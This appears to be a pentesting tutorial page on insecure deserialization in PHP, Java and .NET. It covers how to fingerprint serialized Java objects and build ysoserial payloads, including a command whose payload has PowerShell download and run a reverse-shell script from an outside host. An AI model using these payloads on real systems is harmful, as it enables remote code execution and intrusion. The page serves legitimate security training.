Physical attacks
Mobile Apps Pentesting
Pentesting

Deserialization

Serialization is the process of turning some object into a data format that can be restored later. People often serialize objects in order to save them to storage, or to send as part of communications.

Deserialization is the reverse of that process, taking data structured from some format, and rebuilding it into an object. Today, the most popular data format for serializing data is JSON. Before that, it was XML.

In many occasions you can find some code in the server side that unserialize some object given by the user. In this case, you can send a malicious payload to make the server side behave unexpectedly.

You should read: https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html for learn how to attack.

PHP

For example, in PHP any function of a class that starts with "__" will be executed when an object of that class is deserialized. So, setting some values for the attributes of that class could allow you to execute code.

You can read an explained PHP example here: https://www.notsosecure.com/remote-code-execution-via-php-unserialize/

Java

Fingerprints

If you find some parameter being sent to the server like:

javax.faces.ViewState=rO0ABXVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAJwdAAML2xvZ2luLnhodG1s

You could have found a vulnerable java application. Fingerprints/Magic Bytes of java serialised objects:

  • AC ED 00 05 in Hex

  • rO0 in Base64

  • Content-type header of an HTTP response set to application/x-java-serialized-object

Check if vulnerable

Using the BurpSuite extension gadgetprobe you can identify which libraries are available. With this information it could be easier to choose a payload to exploit the vulnerability. Note that the java classes list can be downloaded from the github (https://github.com/PortSwigger/gadgetprobe/tree/master/wordlists).

You can try exploit it using ysoserial (download here). Download the newest ysoserial.jar file and create a payloads. I would start using the "DNSURL" payload before a RCE payload to test if the injection is possible. Anyway, note that maybe the "DNSURL" payload is not working but other RCE payload is.

# PoC to make the application access an arbitrary URL
java -jar ysoserial-master-SNAPSHOT.jar DNSURL http://b7j40108s43ysmdpplgd3b7rdij87x.burpcollaborator.net > payload
# PoC to tryto execute commands
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections5 'cmd /c ping -n 1 10.10.14.0' > payload
# Encode payload in base64
base64 -w0 payload

If you have access to the source code check for common-collections and "InvokerTransformer" inside the application files:

cd /pat/application
grep -R InvokerTransformer .

Why

Java LOVES sending serialized objects all over the place. For example:

  • In HTTP requests – Parameters, ViewState, Cookies, you name it.

  • RMI – The extensively used Java RMI protocol is 100% based on serialization

  • RMI over HTTP – Many Java thick client web apps use this – again 100% serialized objects

  • JMX – Again, relies on serialized objects being shot over the wire

  • Custom Protocols – Sending an receiving raw Java objects is the norm – which we’ll see in some of the exploits to come

More details

.Net

You could also exploit serialised objects in .Net.

To created the payloads you can use: https://github.com/pwntester/ysoserial.net This tool is a little bit different from Javas one because it can generate Payloads in Binary format (like java ysoserial), in XML and in JSON. For identifying binary format in Base64 you should look for the initial string: AAEAAAD/////

For example, you could create a payload in JSON to execute a PS reverse shell with:

ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "powershell \"IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9/powercat.ps1')\"" -t

Take a look to this POST about how to try to exploit the __ViewState parameter of .Net to execute arbitrary code.

More info about .Net deserialization on this paper: https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf